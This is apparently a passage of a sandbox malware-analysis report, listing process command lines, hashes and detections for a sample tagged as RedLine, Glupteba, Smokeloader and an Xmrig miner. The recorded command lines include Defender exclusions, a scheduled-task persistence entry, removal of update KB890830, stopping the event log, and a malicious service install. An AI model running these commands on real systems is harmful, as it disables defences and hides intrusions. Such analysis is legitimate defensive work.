                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 91%, ReversingLabs
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:08:31:08
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                          Imagebase:0x400000
                                                                                          File size:4'979'200 bytes
                                                                                          MD5 hash:5E94F0F6265F9E8B2F706F1D46BBD39E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:Borland Delphi
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.1369842650.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 75%, ReversingLabs
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:08:31:09
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                          Imagebase:0x7ff760310000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:7
                                                                                          Start time:08:31:09
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:9
                                                                                          Start time:08:31:12
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                                                                                          Imagebase:0xc50000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:10
                                                                                          Start time:08:31:12
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:11
                                                                                          Start time:08:31:12
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\SysWOW64\chcp.com
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:chcp 1251
                                                                                          Imagebase:0x690000
                                                                                          File size:12'800 bytes
                                                                                          MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:12
                                                                                          Start time:08:31:12
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                                                                          Imagebase:0xeb0000
                                                                                          File size:187'904 bytes
                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:14
                                                                                          Start time:08:31:14
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:powershell -nologo -noprofile
                                                                                          Imagebase:0x9b0000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:15
                                                                                          Start time:08:31:14
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:16
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                          Imagebase:0x7ff61fd30000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:17
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\sc.exe delete "UTIXDCVF"
                                                                                          Imagebase:0x7ff659d30000
                                                                                          File size:72'192 bytes
                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:18
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:19
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:20
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\wusa.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                          Imagebase:0x7ff75a260000
                                                                                          File size:345'088 bytes
                                                                                          MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:21
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"
                                                                                          Imagebase:0x7ff659d30000
                                                                                          File size:72'192 bytes
                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:22
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:23
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                                          Imagebase:0x7ff659d30000
                                                                                          File size:72'192 bytes
                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:24
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\sc.exe start "UTIXDCVF"
                                                                                          Imagebase:0x7ff659d30000
                                                                                          File size:72'192 bytes
                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:25
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:26
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:27
                                                                                          Start time:08:31:16
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
                                                                                          Imagebase:0x7ff7ee4a0000
                                                                                          File size:2'654'720 bytes
                                                                                          MD5 hash:B03886CB64C04B828B6EC1B2487DF4A4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 91%, ReversingLabs
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:28
                                                                                          Start time:08:31:16
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                          Imagebase:0x7ff760310000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:29
                                                                                          Start time:08:31:16
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:30
                                                                                          Start time:08:31:17
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\servicing\TrustedInstaller.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\servicing\TrustedInstaller.exe
                                                                                          Imagebase:0x7ff628a10000
                                                                                          File size:192'336 bytes
                                                                                          MD5 hash:D098F2FC042FBF6879D47E3A86FBB4A1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:31
                                                                                          Start time:08:31:18
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                          Imagebase:0x7ff77afe0000
                                                                                          File size:55'320 bytes
                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:32
                                                                                          Start time:08:31:18
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:4'315'536 bytes
                                                                                          MD5 hash:D122F827C4FC73F9A06D7F6F2D08CD95
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000020.00000002.1591101509.000000000299E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000020.00000002.1591528645.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000020.00000002.1591528645.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000020.00000003.1494671167.0000000003AD2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:33
                                                                                          Start time:08:31:18
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                          Imagebase:0x7ff77afe0000
                                                                                          File size:55'320 bytes
                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:34
                                                                                          Start time:08:31:19
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7692 -ip 7692
                                                                                          Imagebase:0xf20000
                                                                                          File size:483'680 bytes
                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:35
                                                                                          Start time:08:31:19
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 844
                                                                                          Imagebase:0xf20000
                                                                                          File size:483'680 bytes
                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:36
                                                                                          Start time:08:31:19
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                          Imagebase:0x7ff61fd30000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:37
                                                                                          Start time:08:31:19
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:38
                                                                                          Start time:08:31:19
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:39
                                                                                          Start time:08:31:19
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\explorer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:explorer.exe
                                                                                          Imagebase:0x7ff633410000
                                                                                          File size:5'141'208 bytes
                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1502667713.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3820414733.0000000001431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1502528304.0000000001E56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1503963151.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3820414733.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1504028725.0000000001E43000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1503587405.0000000001E27000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1503587405.0000000001E43000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1502528304.0000000001E4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1504082814.0000000001E36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1503356384.0000000001E78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1503661320.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1503356384.0000000001E57000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3820414733.00000000014AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3822093253.0000000001E2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:40
                                                                                          Start time:08:31:19
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\wusa.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                          Imagebase:0x7ff75a260000
                                                                                          File size:345'088 bytes
                                                                                          MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:41
                                                                                          Start time:08:31:22
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:powershell -nologo -noprofile
                                                                                          Imagebase:0x9b0000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:42
                                                                                          Start time:08:31:22
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:44
                                                                                          Start time:08:31:53
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                          Imagebase:0x7ff77afe0000
                                                                                          File size:55'320 bytes
                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:46
                                                                                          Start time:08:32:01
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Executed Functions

                                                                                            Function 01790590 Relevance: .5, Instructions: 468COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1374714127.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1790000_25C1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5be17497ff9cc2c307418e9bb41b5ae842af33cb5964016727d930613352d6ad
                                                                                            • Instruction ID: 3e55a311b34c10ac4bc7ad50f0f3d4ad08da150e87592dfa970ff4494695dd08
                                                                                            • Opcode Fuzzy Hash: 5be17497ff9cc2c307418e9bb41b5ae842af33cb5964016727d930613352d6ad
                                                                                            • Instruction Fuzzy Hash: 0B510A34900249CFCB05DFB5E990A9EBBB2FB49704F6045ADC4116B351CB39AD96CBA1
                                                                                            Function 01790A50 Relevance: .2, Instructions: 185COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1374714127.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1790000_25C1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7e7f7d197518a979eefdf5d7be7eb4e4ad64e1a82dbc4ee5b303f47e17cbb592
                                                                                            • Instruction ID: 954342b2c361139c40e2dce5b506146dab78f84f44cdfd75d421a9c25d9eba6c
                                                                                            • Opcode Fuzzy Hash: 7e7f7d197518a979eefdf5d7be7eb4e4ad64e1a82dbc4ee5b303f47e17cbb592
                                                                                            • Instruction Fuzzy Hash: AC71F530700240DFDB25DB28E998A69BBBAFF85310F498169D946C7396CF34EC95CB91
                                                                                            Function 01790848 Relevance: .1, Instructions: 123COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1374714127.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1790000_25C1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0fa5f7b0a4ff4c446599bd7e9e9d62c037584218d663b1382faa8927819f3f32
